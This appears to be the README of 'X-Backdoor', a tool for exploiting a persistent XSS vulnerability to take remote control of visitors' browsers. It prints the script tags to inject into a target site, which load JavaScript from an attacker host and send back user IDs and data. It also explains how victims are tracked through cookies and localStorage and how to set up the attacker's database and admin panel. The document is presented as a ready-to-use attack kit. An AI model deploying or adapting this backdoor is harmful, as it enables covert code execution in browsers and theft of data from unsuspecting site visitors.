X-Backdoor is a tool to take advantage of a persistent XSS vulnerability. The idea is to play and explore the modern browsers capabilities and the impact that these can have when someone can control the clients.
You have a target site and an attacker site. In the attacker site there are all the files of the project:
– db.php – Contains the database configuration
– getjs.php – Send js code to the client
– acp/ – contain all the files to admin the backdoor
Now, the attacker inject (with a persistent XSS) this piece of code in the target site:
<script id="scr72" src="http://attackersite/getjs.php"></script>
<script id="scr72" src="http://attackersite/getjs.php?r=2366&uid=7278&data=somereply"></script>
When a client visit the infected page on the target site for the first time, a random number (his uid) will be generated and he’ll send a special message to the attacker php script. The uid will be saved into localStorage and in a cookie, so the browser will remember its uid. The attacker have to send a code to delete the cookie and clear the localStorage to have a new registration by the same user.
The database schema is in db_dump.sql, you can manually execute the queries or import the file with phpMyAdmin. In the database there are already some functions. See funclib.md to get more functions.
Edit the following files:
+ acp/login.php – Edit the default login password
+ db.php – Insert your database configuration
+ getjs.php – Set some parameter